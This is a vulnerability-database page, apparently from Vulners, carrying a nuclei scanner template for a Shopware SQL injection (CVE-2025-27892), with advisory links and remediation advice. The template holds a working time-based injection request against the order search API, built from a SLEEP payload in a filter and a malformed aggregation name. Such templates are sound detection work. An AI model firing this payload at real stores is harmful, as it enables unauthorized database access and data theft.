Lucene search
K

Shopware < 6.5.8.13 - SQL Injection

🗓️ 03 Jul 2026 03:01:05Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 73 Views

Shopware versions below 6.5.8.13 have a critical SQL injection vulnerability in the API search function.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-27892
10 Apr 202514:38
circl
CNNVD
Shopware 安全漏洞
15 Apr 202500:00
cnnvd
CVE
CVE-2025-27892
15 Apr 202500:00
cve
Cvelist
CVE-2025-27892
15 Apr 202500:00
cvelist
EUVD
EUVD-2025-10294
3 Oct 202520:07
euvd
Github Security Blog
Shopware Vulnerable to Blind SQL-injection in DAL aggregations
8 Apr 202516:33
github
NVD
CVE-2025-27892
15 Apr 202522:15
nvd
OSV
GHSA-8G35-7RMW-7F59 Shopware Vulnerable to Blind SQL-injection in DAL aggregations
8 Apr 202516:33
osv
Positive Technologies
PT-2025-15894 · Shopware · Shopware
8 Apr 202500:00
ptsecurity
RedhatCVE
CVE-2025-27892
17 Apr 202503:12
redhatcve
Rows per page
id: CVE-2025-27892

info:
  name: Shopware < 6.5.8.13 - SQL Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the "aggregations" object. The name field in this "aggregations" in nested object is vulnerable SQL-injection and can be exploited using SQL parameters.
  impact: |
    Authenticated attackers can execute arbitrary SQL queries through the aggregations parameter in the search API, potentially extracting sensitive data from the Shopware database.
  remediation: |
    Upgrade to Shopware version 6.5.8.13 or later that properly sanitizes the aggregations parameter.
  reference:
    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2025-001/
    - https://nvd.nist.gov/vuln/detail/CVE-2025-27892
  classification:
    epss-score: 0.11315
    epss-percentile: 0.95444
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L
    cvss-score: 6.8
    cve-id: CVE-2025-27892
    cwe-id: CWE-89
  metadata:
    max-request: 1
    vendor: shopware
    product: shopware
    verified: true
  tags: cve,cve2025,shopware,sqli,time-based-sqli,vuln

variables:
  token: "{{token}}"

http:
  - raw:
      - |
        @timeout: 30s
        POST /api/search/order HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:137.0) Gecko/20100101 Firefox/137.0
        Accept: */*
        Authorization: Bearer {{token}}
        Content-type: application/json

        {
          "filter": [
            {
              "type": "equals",
              "field": "transactions.stateMachineState.technicalName",
              "value": "paid` FROM `order`; SELECT SLEEP(7); -- "
            }
          ],
          "aggregations": [
            {
              "type": "histogram",
              "name": "order_sum_bucket",
              "field": "orderDateTime",
              "interval": "day",
              "aggregation": {
                "type": "sum",
                "name": "totalAmount ? ? --",
                "field": "amountTotal"
              }
            }
          ]
        }


    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "Warning: Undefined array")'
          - 'contains(content_type, "application/json")'
          - 'status_code == 500'
          - 'duration>=5'
        condition: and
# digest: 4a0a004730450221009d89c33db1105b97044cb010f7c2c0ba734c0236789daad03517df886270a69d02200fba518ea45f8da8151c81b0c7ea5877e877d023cd65c2413b1e1b1f37c40d07:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6Medium risk
Vulners AI Score6
CVSS 3.16.8
EPSS0.11315
SSVC
73